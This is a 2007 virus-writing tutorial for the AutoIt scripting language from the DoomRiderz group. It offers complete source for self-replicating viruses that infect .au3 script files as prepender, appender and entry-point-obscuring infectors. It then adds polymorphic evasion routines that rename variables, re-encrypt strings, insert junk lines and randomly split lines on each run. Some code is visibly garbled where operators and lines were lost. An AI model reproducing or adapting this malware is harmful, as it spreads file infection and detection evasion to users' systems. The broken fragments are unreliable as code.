Genetix AutoItv3 Vir Tutorial

AutoIt Virus Writing Guide Genetix[DoomRiderz] JAN-2007

Introduction: * About AutoIt Infections: * Prepender * Appender * EPO Polymorphism: * * * *

Variable changing Randomized String Encryption Adding trash Breaking lines (Possibly New method)

Outroduction: * Credits!.... ++++++++++++++++++++++++++++++++++++ ++++++++++About AutoIt+++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ AutoIt v3 is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting. It uses a combination of simulated keystrokes, mouse movement and window/control manipulation in order to automate tasks in a way not possible or reliable with other languages (e.g. VBScript and SendKeys). AutoIt is also very small, self-contained and will run on 95, 98, ME, NT4, 2000, XP & 2003 out of the box with no annoying "runtimes" required! You can even make compiled executable scripts that can run without AutoIt being installed! AutoIt was initially designed for PC 'roll out' situations to reliably configure thousands of PCs, but with the arrival of v3 it has become a powerful language able to cope with most scripting needs. this is from the AutoIt website..I'm lazy! see http://www.hiddensoft.com/autoit3/ So anyway my opinion it's just ANOTHER script language and nobody serious about virus writing cares about these things but for me it's all about fun and enjoying youself so just do w/e you

enjoy.. I enjoyed this so maybe someone else will too. ++++++++++++++++++++++++++++++++++++ +++++++++++++Prepender+++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;Genetix[DoomRiderz] $self=@ScriptName ;get self name $line="" $virus="" $readhost="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) ;read line If @error = -1 Then ExitLoop ;exit EOF if ($line = ";endvirus") then ExitLoop ;exit at end of the virus code EndIf $virus = $virus & @CRLF & $line ;build virus body Wend FileClose($me) $search = FileFindFirstFile("*.au3") ;find AutoIt files If $search = -1 Then Exit ;exit no files EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop ;same exit if no files $host = FileOpen($file, 0) If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($file)) ;read entire file into variable FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;make sure its not already infected $InsertVirus = FileOpen($file,2) FileWriteline($InsertVirus, _ $virus & @CRLF ";endvirus" & @CRLF & $readhost) ;write virus before victims code (prepend) FileClose($InsertVirus)

EndIf Wend ;continue searching ;endvirus

++++++++++++++++++++++++++++++++++++ +++++++++++++Appender++++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;start ;Genetix[DoomRiderz] $self=@ScriptName ;get script name $line="" $virus="" $readhost="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) If @error = -1 Then ExitLoop ;exit if EOF if ($line = ";start") then ;find beginning of virus code ExitLoop ;exit loop when found EndIf Wend while 1 $line = FileReadLine($me) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = ";endvirus") then ExitLoop ;Stop reading at end of virus EndIf $virus = $virus & @CRLF & $line ;build the virus Wend FileClose($me) $search = FileFindFirstFile("*.au3") ;search for AutoIt files If $search = -1 Then Exit ;exit if nothing is there EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop

$host = FileOpen($file, 0) ;open victim If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($file)) ;read the entire host code FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;make sure it isnt infected already $InsertVirus = FileOpen($file,2) FileWriteline($InsertVirus, _ $readhost & @CRLF & ";start" & @CRLF & $virus & @CRLF & ";endvirus") ;append the virus FileClose($InsertVirus) EndIf Wend ;continue searching ;endvirus

++++++++++++++++++++++++++++++++++++ ++++++++++++++++EPO++++++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;start ;Genetix[DoomRiderz] $self=@ScriptName ;get script name ;setup some variables, this needs alot! $line="" $begin="" $virbody="" $virus="" $nextpart="" $readhost="" $complete="" $me = FileOpen($self, 0) ;open itself while 1 ;loop until ExitLoop do us part $line = FileReadLine($me) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = ";start") then ExitLoop ;stop, beginning of the virus is found EndIf Wend while 1 $line = FileReadLine($me)

;read 1 line perl loop If @error = -1 Then ExitLoop ;yea.. if StringMid($line, 1, 9) = ";endvirus" Then ExitLoop ;stop, end of the virus is found EndIf $virbody = $virbody & @CRLF & $line ;build the virus body Wend FileClose($me) ;byez $virus = ";start" & @CRLF & $virbody & @CRLF & ";endvirus" ;virus stored in $virus $search = FileFindFirstFile("*.au3") ;find files If $search = -1 Then Exit ;exit if nothing is there EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop ;again.. nvm $host = FileOpen($file, 0) ;open any au3 file If $host = -1 then ExitLoop $readhost = FileRead($host, FileGetSize($file)) ;read it entire host into $readhost FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;check if its already infected if StringInStr($readhost, "EndFunc") False Then ;can it use EPO on this file? $target = FileOpen($file, 0) ;open up the victim file again while 1 ;loopy $line = FileReadLine($target) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = "EndFunc") then ;find a home for the virus ExitLoop ;exit loop when thats found EndIf $begin = $begin & @CRLF & $line ;append lines from start to "EndFunc" Wend while 1 $line = FileReadLine($target) ;read line's again If @error = -1 Then ExitLoop ;exit EOF

$nextpart = $nextpart & @CRLF & $line ;read from "EndFunc" to EOF Wend FileClose($target) ;here the virus gets 2 parts of the victim. First is everything until "EndFunk" 2nd is everything after it ;so it has these stored in 2 different variables. ;now we can insert the virus into the middle! hostpart1 + virus + hostpart2. easy! $complete = $begin & @CRLF & $virus & @CRLF & "EndFunc" & @CRLF & $nextpart ;join everything together $InsertVirus = FileOpen($file,2) ;open the victim for writing FileWriteline($InsertVirus, $complete) ;insert the virus FileClose($InsertVirus) EndIf EndIf Wend ;more searching! ;endvirus ++++++++++++++++++++++++++++++++++++ +++++Variable name changing++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ #include ;include this to use arrays in AutoIt Dim $avArray ;define array $avArray = _ArrayCreate("avArray", "self", "host", "readhost", _ "rewrite", "newvalues", "var") ;setup variables to replace $self=@ScriptName ;get the script name $readhost="" $host = FileOpen($self, 0) ;open self If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($self)) ;read entir virus into variable FileClose($host) $newvalues="" FOR $i=0 to UBound($avArray) - 1 ;loop through each element in the array $var=""

for $x=1 to random(6,12,1) $var = $var & Chr(random(97,122,1)) ;create a new random sized variable ;this can be improved alot! next $readhost = StringReplace($readhost, $avArray[$i], $var) ;replace with new variable Next $rewrite = FileOpen($self,2) FileWrite($rewrite, $readhost) ;rewrite with new code FileClose($rewrite) ++++++++++++++++++++++++++++++++++++ ++++Randomized String Encryption+++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ $self=@ScriptName ;get the script name $readhost="" $host = FileOpen($self, 0) If $host = -1 then ExitLoop $readhost = FileRead($host, FileGetSize($self)) ;read everything into the variable FileClose($host) $code="пÌÂÍËÇØÃÂ~ÑÒÐÇÌÅ~ÃÌÁÐ×ÎÒÇÍÌ94" ;the encrypted string with key appended $original=$code ;original code $key=StringMid($code, stringlen($code)-1, stringlen($code)) ;get the decryption key $decrypt="" $de="" For $i=1 to StringLen($code) $de = Asc(StringMid($code, $i, 1)) - $key ;decrypt using key $decrypt = $decrypt & chr($de) Next $mycode=StringMid($decrypt, 1, stringlen($decrypt)-2) ;remove old key MsgBox(0, "", $mycode) ;good for debugging $rndkey = Random(10,99,1) ;get a new random key $str="" $en="" For $i=1 to StringLen($mycode) $str = Asc(StringMid($mycode, $i, 1)) + $rndkey ;encrypt with new key $en = $en & chr($str) Next

$new = StringReplace($code, $code, $en) & $rndkey ;replace old encrypted string with new $newstr=StringReplace($readhost, $original, $new) ;replace it in the virus code $replace = FileOpen($self,2) FileWrite($replace, $newstr) ;complete! FileClose($replace) actually the idea is to encrypt the virus body so it changes like polymorphism while also being encrypted. but this is good for an example i guess.. ++++++++++++++++++++++++++++++++++++ ++++++++Adding Trash to code+++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ $self=@ScriptName ;get self name $line="" $virus="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) ;read line If @error = -1 Then ExitLoop ;exit EOF if random(1,2,1) = 2 then ;should it insert trash here? $trash="" For $i = 1 to random(30,100,1) ;random size 30 to 100 cheracters $trash=$trash & chr(random(50,97,1)) ;generate trash next $line=$line & @CRLF & ";" & $trash ;insert trash EndIf If StringMid($line,1,1) ";" then $virus = $virus & @CRLF & $line ;build the new virus body EndIf Wend FileClose($me) $rewrite = FileOpen($self,2) FileWrite($rewrite, $virus) ;rewrite with new code FileClose($rewrite) ++++++++++++++++++++++++++++++++++++ +++++++++++Breaking Lines++++++++++ +-----------------------------------------------------------------------

--------------++++++++++++++++++++++++++++++++++++ I'm gussing you've not seen this method before? but if so then here it is again. $curline="" $rem="" $restore="" $NewCode="" $me = FileOpen(@ScriptName, 0) ;open self for reading while 1 $curline=FileReadLine($me) ;read the first line If @error = -1 Then ExitLoop ;exit at EOF FOR $i = 1 to 20 ;some things i just cant explain! IF StringInStr($curline, chr(95)) then ;check if there is an underscore in this line $rem = stringmid($curline, 1, StringInStr($curline, chr(95)) - 1) ;remove the underscore $restore = $rem & FileReadLine($me) ;join the line back together $curline = $restore ;set curline back to its normal self ENDIF NEXT $curline = ;call function $NewCode = ;build the new wend FileClose($me)

DoSplit($curline) to do the line splitting $NewCode & @CRLF & $curline code

$rewrite = FileOpen(@ScriptName, 2) ;open self for writing FileWrite($rewrite, $NewCode) ;rewrite with new code FileClose($rewrite) ;close. Func DoSplit($line) ;entry point of splitting function DIM $pos,$pr1,$pr2,$add,$m="" ;setup some variables FOR $i = 1 to stringlen($line) ;loop through the line $m = stringmid($line, $i, 1) ;get the current character IF $m = chr(44) OR $m = chr(61) OR $m = chr(38) then ;check if its anything we can use $pr1 = stringmid($line, 1, $i) ;get the line from start to pos of $m $pr2 = stringmid($line, $i+1, stringlen($line))

;other half from $m to end of line IF Random(1,2,1) = 2 THEN $line = $pr1 & " " & chr(95) & @CRLF & $pr2 ;if rnd is 2 then split the line into 2 parts

ENDIF NEXT Return $line ;return the new line EndFunc ;here is an example of what this method can do: ;a line of code can look like this: stringmid($curline, 1, StringInStr($curline, chr(95)) - 1) ;it can also look like this stringmid($curline, 1, _ StringInStr($curline, chr(95)) - 1) ;or this: stringmid($curline, _ 1, StringInStr($curline, _ chr(95)) - 1) ;and so on.. so each time the code is executed it will add a continuation character "_" in random locations only if this location supports a contuniation.. anything after these characters (. , &) will allow an underscore "_". Splitting 1 line into 2 parts or more.. or join them back to form a single line.. kinda really simple stuff! You should try this to understand it better, it's easy to rewrite into VBS and everyone knows vbs dont they? -----------------------------------------------------------------------------------------------------------------------CREDITS! Kefi - im still awaiting an email from you! retr0 - BUZZ! free0n - puts dances around a lamb pole :p synge - i forgive you for your evil deeds. slagehammer - thx for all the asm sources it's just what i needed! yays! jmp dr3f dr3f: mov irc,[you] And hello's to everyone in DoomRiderz and anyone else missing, i just want to get this over with! ps: i had this strange idea of polymorphism of a kind.. encrypting/decrypting random lines.. i had some success but then got busy with "real life" (yes synge i have 1 :p) so someone else can try this if they think it's worth it. Thats all hope you enjoyed! byez!